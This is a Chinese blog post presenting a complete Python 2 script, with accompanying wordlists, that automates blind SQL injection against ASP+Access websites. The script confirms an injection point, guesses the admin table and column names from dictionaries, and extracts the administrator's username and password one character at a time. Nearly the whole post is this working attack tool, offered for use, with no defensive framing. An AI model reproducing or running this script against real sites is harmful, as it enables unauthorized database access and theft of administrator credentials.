Python实现ASP+ACCESS注入,不用SOCKET

不用SOCKET是因为个人感觉Python的3个HTTP协议的模块实在是功能太强了.
虽然它们的底层还是通过SOCKET实现的.
三个HTTP模块就是HTTPLIB,URLLIB,URLLIB2

呵呵

   


CODE   
代码:

--------------------------------------------------------------------------------


#!/usr/bin/python
# ASP ACCESS SQL Injection Test
# Written by ToToDoDo (QQ:8924007) Email: osbbs@osbbs.com

from sys import exit
from urllib import urlopen
from string import join,strip
from re import search

def get_tablename():
tablefile = open("table.txt")
for line in tablefile.readlines():
line = strip(line)
sql = join(['%20and%20exists%20(select%20*%20from%20',line,')'],'')
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
  print "Error:",line
else:
  print "Found the admin table name:", line,"/n"
  print "Now! Start to get name column from",line,"table"
  get_namecolumn(line)
  print "Now! Start to get password column from",line,"table"
  get_passwordcolumn(line)
  break

def get_namecolumn(tablename):
namecolumn = open("namecolumn.txt")
for namecolumnline in namecolumn.readlines():
namecolumnline = strip(namecolumnline)
sql = join(['%20and%20exists%20(select%20',namecolumnline,'%20from%20',tablename,')'],'')
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
  print "Error:",namecolumnline
else:
  print "Found the  name column from admin table:", namecolumnline,"/n"
  get_usernamelenth(tablename,namecolumnline)
  break

def get_passwordcolumn(tablename):
passwordcolumn = open("passwordcolumn.txt")
for passwordcolumnline in passwordcolumn.readlines():
passwordcolumnline = strip(passwordcolumnline)
sql = join(['%20and%20exists%20(select%20',passwordcolumnline,'%20from%20',tablename,')'],'')
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
  print "Error:",passwordcolumnline
else:
  print "Found the password column from admin table:", passwordcolumnline,"/n"
  get_passwordlenth(tablename,passwordcolumnline)
  break

def get_usernamelenth(tablename,namecolumn):
for x in range(1,51):
sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',namecolumn,')=',str(x),')'],'')
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
  print "Error:",x
else:
  print "Found the lenth of the username:", x,"/n"
  get_username(tablename,namecolumn,x)
  break

def get_passwordlenth(tablename,passwordcolumn):
for x in range(1,51):
sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',passwordcolumn,')=',str(x),')'],'')
urlfile = urlopen(url+sql)
htmlcodes = urlfile.read()
if not search(judge,htmlcodes):
  print "Error:",x
else:
  print "Found the lenth of the password:", x,"/n"
  get_password(tablename,passwordcolumn,x)
  break

def get_username(tablename,namecolumn,lenth):
list = []
for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]:
    list.extend(x)
global username
username  = ''
for y in range(1,lenth+1):
print "Now! Crack the left ",y," of the username","Waiting~~~~~~~"
for z in list:
     sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",namecolumn,",",str(y),",","1))=",str(z),")"],'')
     urlfile = urlopen(url+sql)
     htmlcodes = urlfile.read()
     if search(judge,htmlcodes):
         username = join([username,chr(z)],'')
         break
print "Found the username = :",username,"/n"

def get_password(tablename,passwordcolumn,lenth):
list = []
for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]:
    list.extend(x)
global password
password = ''
for y in range(1,lenth+1):
print "Now! Crack the left ",y," of the password","Waiting~~~~~~~"
for z in list:
     sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",passwordcolumn,",",str(y),",","1))=",str(z),")"],'')
     urlfile = urlopen(url+sql)
     htmlcodes = urlfile.read()
     if search(judge,htmlcodes):
         password = join([password,chr(z)],'')
         break
print "Found the password = :",password,"/n"

print "/n########################################################################/n"
print " ASP+ACCESS SQL Injection Scripts By ToToDoDo with Python 2.3.x(QQ:8924007)"
print " Email: osbbs@msn.com/n"
print "========================================================================";
print """Usage:
C:/Python23>python asp_inject.py
Supply a URL to test inject =  http://127.0.0.1/article/list.asp?id=3

Supply some string in correct page but not in error page to help this script to
judge properly.

Judge string = test/n"""
print "########################################################################/n";
url = raw_input('Supply a URL to test inject =  ')
if url == '':
print "U must supply a URL with '.asp?xxx=' in"
exit(1)

judge = raw_input("/nSupply some string in correct page but not in error page to help this script to judge properly./n/nJudge string = ")
if judge == '':
print "U must supply a string to help judge!"
exit(1)

a = '%20and%201=1'
b = '%20and%201=2'

urlfile_a = urlopen(url+a)
urlfile_b = urlopen(url+b)

htmlcodes_a = urlfile_a.read()
htmlcodes_b = urlfile_b.read()

if search(judge,htmlcodes_a) and not search(judge,htmlcodes_b):
print "/n/n/nFound injection:",url,"/n/n/nNow,start to get the table name!","/n"
get_tablename()
print "/n/n/nThe admin's account name is ",username,"/nThe admin's password is ",password
else:
print "Can't be Injected"  

--------------------------------------------------------------------------------







需要3个字典文件:
table.txt:
user
userinfo
admintable
admin
article_admin

namecolumn.txt:
name
username
u_name
uname
adminname

passwordcolumn.txt
pass
adminpass
pwd
password
passwd
admin_pass
admin_password
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值